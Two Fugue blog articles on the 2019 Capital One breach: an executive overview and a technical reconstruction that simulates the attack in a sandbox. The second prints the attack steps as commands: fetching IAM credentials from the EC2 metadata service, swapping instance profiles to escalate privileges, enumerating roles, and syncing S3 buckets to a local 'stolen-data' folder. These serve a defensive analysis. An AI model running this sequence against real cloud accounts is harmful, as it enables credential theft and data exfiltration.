What Executives Should Know About the Capital One Breach

This article was originally published on Fugue's blog here.

By Phillip Merrick, CEO of Fugue

Most enterprises are already using public cloud computing services at scale or are planning to adopt the cloud soon. As an executive, chances are you’re paying attention to the Capital One data breach and wondering how this event should impact your decision-making.

This is understandable and good. Capital One has been a true trailblazer within the financial sector in adopting and innovating in the cloud at a time when most of their peers have been slower in making the transition. They’ve attracted an army of cloud experts, including some incredibly talented cloud security professionals. I know some of them personally and respect them greatly. Yet they still got breached. How? And what can we learn from this?

Before we dive in, the following truth can’t be stressed enough: The cloud itself is far more secure than any data center. However, we have to think differently about security in the cloud versus the way we have thought about security in the data center.

I’ll explain why and provide some guidance on how you can ensure your cloud and security teams are properly prioritizing and managing the risks. But first, let’s look at what happened in this case.

This data breach was the result of cloud misconfiguration

Whether or not this is the first time you have heard the term “cloud misconfiguration,” it won’t be the last. According to Neil MacDonald at Gartner, “nearly all successful attacks on cloud services are the result of customer misconfiguration, mismanagement and mistakes.”

That seems to be the case here, but it’s not as simple as leaving an Amazon Web Services (AWS) S3 bucket (an object storage service) open to public access, which unfortunately does happen with some frequency. The hacker here appears to have exploited a series of cloud misconfigurations to move laterally within the company’s cloud environment in order to extract sensitive data. Here’s an oversimplified explanation:

  1. A misconfigured firewall allowed the hacker to access an Amazon EC2 instance (a virtual server).
  2. Once on the EC2 instance, the hacker obtained an IAM (Identity and Access Management) role which gave her access to S3 buckets containing customer data.
  3. Overly broad access to S3 from the compromised server enabled the hacker to discover the buckets, duplicate their contents, and extract the data.

My colleague and Fugue CTO Josh Stella wrote up a detailed technical analysis of the breach based on the information we have, along with some technical advice. You can read it here and/or point your technical folks at it.

We’ll no doubt learn more about this breach, and possibly others by the same hacker, over time. But there are some takeaways we can learn now, and steps we can take.

1. Ask Questions About Your Cloud Security Posture

The risks due to cloud misconfiguration are real, and you need to make sure your cloud and security teams take them seriously. If you don’t already know, find out who’s responsible for the security of your cloud environments and data. It may be a security team, a DevOps team, or perhaps individual application teams. Ask them questions about your cloud security posture.

  • What are we doing to prevent cloud misconfigurations from happening in the first place? Do we have automated, policy-based guardrails in place to prevent misconfigurations and policy violations from being introduced into our cloud environments? Are we evaluating the infrastructure environment as a whole for misconfiguration vulnerabilities (and not just individual resource configurations)?
  • What are we doing to find and fix cloud misconfigurations when they do occur? Getting your cloud configurations secure on day one is good, but a lot can go wrong on day two. Change in the cloud is constant: new applications are being developed, existing applications are being enhanced, and technical staff make changes to cloud configurations to investigate and resolve production problems. We call all these changes “drift” and any one drift event can introduce or reintroduce a cloud misconfiguration. Is your team continuously identifying drift, misconfigurations, and policy violations? Are they using automated remediation for security-critical cloud resources to reduce the risk of human error and lengthy response times?
  • Do we have continuous visibility into the configuration state of our cloud environments? One big advantage the cloud has over the data center is that in the cloud, every configuration detail is knowable via application programming interfaces (APIs). If your team is manually auditing cloud configurations, that’s a problem that should be addressed with automation.

2. Cloud security is different. So think differently.

The cloud is fundamentally different than the data center, and that means cloud security is fundamentally different than data center security. Many of the security tools and processes that worked in the data center simply aren’t effective or don’t scale well in the cloud.

There are many ways the cloud is different from the data center. First and foremost, everything is software-defined and programmable via APIs. This means that not only can your application deployments be fully automated, but so can your cloud security. The bad guys are using automation, and you need to use automated defenses to keep up. Make sure your penetration testers, who should be outside vendors, are looking for cloud misconfigurations as part of their efforts. Our experience is that traditional penetration testers don’t always do this.

Traditional approaches to things like network security don’t apply as much in the cloud — for one thing, you aren’t typically monitoring network traffic directly, though new features such as AWS VPC Traffic Mirroring or Azure Virtual Network TAP may help eventually. Instead the paradigm of IAM has become paramount. You can think of identity as the new network or the new firewall. You will want to put a lot of focus on this and make sure your teams aren’t using overly permissive IAM roles. The principle of least permissions to accomplish a desired task is key here.

Because the cloud is programmable, your developers are moving fast and making cloud infrastructure decisions, including those with security ramifications. Empower them to move fast and securely with tools to automate cloud security and compliance.

I wrote recently on the five things executives need to know about cloud security. You can read it here.

3. There will be FUD. Ignore it.

Right now legacy technology vendors are using this event in order to sell fear, uncertainty, and doubt (FUD)—so they can keep selling their products. And many organizations inevitably have people on staff who are resistant to change—who will use events like this to try to slow down or stop cloud adoption.

Make no mistake—the cloud is highly secure, so don’t let anyone convince you otherwise. Cloud providers like AWS and Microsoft Azure have incredibly impressive security track records. There have been no data breaches due to a security failure by any of the major cloud providers. None.

The FUD peddlers either don’t understand the cloud or they don’t like change. And sometimes they may not have your best interests at heart.

If you avoid the cloud or slow your adoption, you’re not making your IT infrastructure, applications, and data more secure. You’re simply ensuring that you’ll be slower, less agile, less efficient, and less competitive. And in all likelihood, less secure.

Read more industry insights from the team at Fugue here.

About the author

Phillip Merrick is the CEO of Fugue, a leading provider of cloud security and compliance software. Prior to joining Fugue he built Sparkpost into a leading cloud email delivery provider, going from zero to eight figures of ARR in three years. Before Sparkpost he led webMethods, Inc., a leading vendor of business integration software, which he co-founded in 1996. Under his leadership, webMethods pioneered web APIs, web services (for which Phillip co-holds the original patents) and Internet-based software integration technologies.


A Technical Analysis of the Capital One Cloud Misconfiguration Breach

This article was originally published on Fugue's blog here. 

By Josh Stella, Co-founder & Chief Technology Officer, Fugue

This is a technical exploration of how the Capital One breach might have occurred, based on the evidence we have from the criminal complaint. I want to start by saying that I deeply respect the Capital One cloud team, and have friends on it. They’ve been leaders in cloud computing, and what happened to them could have happened to nearly anyone. I’m also not criticizing Amazon Web Services (AWS)⁠—my previous employer. They offer secure services and I have nothing but respect for them. The purpose of this post is to explore a combination firewall/IAM/S3 attack to illustrate some of the dangers of cloud misconfigurations that every organization on cloud should heed.

In order to write this, I analyzed the technical details of the FBI complaint, and then formed a hypothesis of how the attack might have taken place. I then simulated the attack in my development account, so that I could provide specific details in this post.

The facts as we know them

We have a smattering of information on the attack from the FBI complaint, and from social media posts by the alleged attacker. It appears that the attacker used Tor and IPredator in combination to obfuscate her identity, and through those services, discovered a misconfigured firewall in the Capital One AWS environment. What isn’t clear is whether this was a targeted attack on Capital One, or an opportunistic attack upon finding the misconfiguration.

Many articles have been written on the possible motivations and biography of the attacker, so I’ll leave those aside to focus on the technical specifics. There were four different elements to the attack that we know about:

  • Misconfigured firewall
  • Gaining access to an EC2 instance
  • Getting IAM role access to S3
  • S3 bucket discovery and duplication

Each of the above is explored in some detail below.

How the hack could have happened

We have some details, but really not that many, so I’ve employed a fair amount of speculation and interpretation of the facts that we do have. I’ll clearly state when I’m speculating as we walk through the steps of the attack below. To provide specifics, I simulated some aspects of the Capital One breach in a sandbox environment.

The environment contains:

  1. a basic VPC network
  2. a Security Group that allows HTTP(S) and SSH
  3. a private S3 Bucket
  4. two IAM Roles – one with S3 access, and one without
  5. an EC2 Instance with a public IP address, using the IAM Role that doesn’t have S3 access

My goal was to go from shell access on the EC2 instance to the ability to access and copy the S3 data in the private buckets.

Before we go into detail on the various steps, it’s worth noting that the FBI learned, via a tip, of a GitHub-hosted file that contained the IP address of a server, along with three commands:

“Capital One determined that the April 21 File contained code for three commands, as well as a list of more than 700 folders or buckets of data.” We’ll go into some detail on each of these commands, what they might have been, and the possible strategy used by the attacker.

Step one: misconfigured firewall

According to the FBI Complaint, “A firewall misconfiguration permitted commands to reach and be executed by that server, which enabled access to folders or buckets… (III.A.10)”

This suggests that the firewall was external to the server rather than a local firewall, though the complaint isn’t explicit. While there are many firewall virtual appliances available on AWS, generally this would be a Security Group. It seems that a dangerous port was left open on whichever firewall type was in use, and this might have been the initial opening for the attack. It’s possible that an SSH port was opened for a maintenance window, or perhaps the server in question was left over from development efforts and no longer in use. Another possibility is that the server was running an application such as MongoDB or Elasticsearch that requires an open port to function, but which should never have been exposed to the Internet via the firewall. Whatever the details, the attacker found a path into the Capital One cloud computing infrastructure.
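
For illustration only (the complaint doesn’t say which port or rule was involved, so the group ID and port below are placeholders), a single overly permissive Security Group rule like this is all it takes to expose a server to the entire internet:

> aws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 22 --cidr 0.0.0.0/0

Any ingress rule with a source of 0.0.0.0/0 on an administrative or application port is an open invitation to whoever happens to find it.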

Step two: gaining access to an EC2 instance

Based on the FBI complaint’s description of the compromised entity as a “server,” and the fact that the attacker was able to extract IAM credentials from it, it appears that an EC2 Instance was breached. This might have been through an application or OS vulnerability—we simply don’t know. For the purposes of my simulation of the attack, I assumed the attacker gained shell access, but not root access, to the instance, as all the remaining steps require only basic shell access to complete.

Step three: getting IAM role access to S3

“…Capital One determined that the first command, when executed, obtained the security credentials for an account known as ***-WAF-Role that, in turn, enabled access to certain of Capital One’s folders at Cloud Computing Company. (III.A.11)”

Much of the “action” in this breach was via IAM role access to private S3 buckets, seemingly via AWS CLI commands from the compromised server. Much has been made in the press of the name of the role, but there is no solid evidence that this server was itself a WAF. It is common to “borrow” IAM roles in dynamic AWS environments (it’s not a great practice, but it is a common one), and, as will be shown below, policy associations can be changed and often have “Role” in the name. Perhaps this server was just something left around without the tags that would surface it on management tooling dashboards. I’ve rarely seen a sizable AWS account without orphaned resources lying around one place or another.

If the server was itself a WAF, and intentionally had read/write access to buckets and objects in those buckets containing PII data, that was a naive defense strategy, for the obvious reason that a single firewall misconfiguration could bypass all architectural defenses protecting the sensitive data. This isn’t the only explanation for the breach, however, and I suspect that there was more to it, using IAM and EC2 features designed for flexibility but potentially misused to grant additional privileges.

Given that they are describing the “first command”, I think it’s reasonable to assume that they are referring to an AWS CLI script. If the EC2 instance already had access to S3, the attacker would have only needed to execute something like:

> curl http://169.254.169.254/latest/meta-data/iam/security-credentials/DemonstrationEC2Role

This command retrieves the current temporary credentials for the IAM role from the EC2 instance metadata service. The output looks like this (shown here with placeholder values):
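
{
  "Code" : "Success",
  "LastUpdated" : "2019-08-04T02:13:09Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA****************",
  "SecretAccessKey" : "****************************************",
  "Token" : "FQoGZXIvYXdzE...[corrupted]...",
  "Expiration" : "2019-08-04T08:43:47Z"
}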

In the output above, the access key and secret access key are replaced with *’s and the token is corrupted to protect the innocent.

This is all that would be needed to access the S3 buckets and their content.
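
To make concrete how portable those credentials are (the values below are placeholders, not anything from the breach), an attacker can export them as environment variables on any machine with the AWS CLI installed and issue requests as that role:

> export AWS_ACCESS_KEY_ID=ASIA****************
> export AWS_SECRET_ACCESS_KEY=****************************************
> export AWS_SESSION_TOKEN=FQoGZXIvYXdzE...
> aws s3 ls

Until the temporary credentials expire, calls made with them are authorized exactly as if they came from the instance’s role.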

But there is another possibility as to what that “first command” did, and everyone who uses AWS needs to be aware of it. If the compromised server did not have access to the private S3 buckets, but did have permissions to list and attach IAM policies, the attacker could have used these capabilities to essentially go shopping for a set of credentials that would provide this access. Since IAM permissions often have no relationship to IP-level network access controls, and the AWS services connect via IAM, these roles and policies form a sort of alternate network that needs to be secured just as a traditional network does. IAM becomes a primary means of “lateral movement” within the cloud environment.

The command below, for example, replaces one set of IAM permissions with another:

> aws ec2 replace-iam-instance-profile-association --association-id iip-assoc-00facaf2870f3bcc9 --iam-instance-profile Name=DemonstrationEC2Role

which returns the following, showing that I’ve successfully replaced the existing IAM permissions for the ones in the DemonstrationEC2Role policy:
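
{
    "IamInstanceProfileAssociation": {
        "AssociationId": "iip-assoc-0abcd1234ef567890",
        "InstanceId": "i-0123456789abcdef0",
        "IamInstanceProfile": {
            "Arn": "arn:aws:iam::123456789012:instance-profile/DemonstrationEC2Role",
            "Id": "AIPAEXAMPLEEXAMPLE"
        },
        "State": "associating"
    }
}

(The association, instance, and account identifiers above are placeholders.)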

Other useful commands for such a fishing expedition include:

> aws iam list-roles

> aws iam list-policies

> aws iam list-instance-profiles

These do what they say on the tin—enumerate the catalogue of available IAM resources an attacker might want to use once they have shell on an EC2 instance.

In this example, I replaced a limited IAM profile with one that has additional permissions to S3. We can’t discount that the attacker used a similar approach in the Capital One breach. Whether or not this was the case, it’s a critical capability to keep in mind when you configure IAM roles for your EC2 instances, especially public-facing ones, as IAM permissions can effectively “jump” to private resources in your environment.

In either scenario, the attacker gained access to the credentials needed to retrieve information from S3 and to duplicate that information.

Step four: S3 bucket discovery and duplication

“Capital One determined that the third command (the “Sync Command”), when executed, used the ***-WAF-Role to extract or copy data from those folders or buckets in Capital One’s storage space for which the ***-WAF-Role account had the requisite permissions. (III.A.11)”

This suggests the use of the AWS CLI command `aws s3 sync`, which I take as further evidence that the attacker gained shell access to the EC2 instance and used the AWS CLI to perform these commands. What isn’t clear is how the attacker knew which S3 buckets to sync, but if the IAM role used had adequate permissions, it’s pretty simple to list all the buckets accessible via that role. This highlights the danger of a single IAM role having such broad S3 permissions; even at this point, without the ability to discover the target buckets, the attacker would likely not have been able to capture much, if any, data.
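
As a sketch of what that discovery and duplication might have looked like from the compromised instance (the bucket name here is hypothetical), only two CLI commands are needed:

> aws s3 ls
> aws s3 sync s3://example-customer-data ./stolen-data

The first lists the buckets in the account (if the role permits it); the second recursively copies a bucket’s contents to local storage, ready for exfiltration.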

Recommendations

  1. Constantly monitor for overly permissive Security Groups or any other access mechanism open to 0.0.0.0/0 (see the example command after this list). Checking on provisioning is necessary, but not nearly good enough. Cloud infrastructure is created and modified via API, which means that it is often drifting over time as different teams and people interact with it.
  2. Apply the principle of least privilege and ruthlessly limit IAM roles to what is absolutely necessary for the business function of the resource using that role. In the case of S3, you might consider different public endpoints for read and write operations, with different IAM roles that cannot perform the other function. Eliminate all production use cases where S3 bucket listing is enabled, in favor of shared secrets or other mechanisms.
  3. Don’t allow EC2 instances to have IAM roles that allow attaching or replacing role policies in any production environments.
  4. Ruthlessly clean up unused cloud resources (especially servers and S3 buckets) left over from prior development or production debugging efforts.
  5. Include cloud infrastructure misconfiguration in your pen testing efforts. Use outside pen testers and make sure they are knowledgeable about how to find and exploit cloud misconfigurations.
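
As one example of the kind of check recommendation 1 calls for, the AWS CLI can enumerate Security Groups that allow ingress from anywhere (this is a point-in-time query; continuous monitoring means running checks like this, or a policy engine, on every change):

> aws ec2 describe-security-groups --filters Name=ip-permission.cidr,Values=0.0.0.0/0 --query "SecurityGroups[].GroupId"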

Read more industry insights from the team at Fugue here.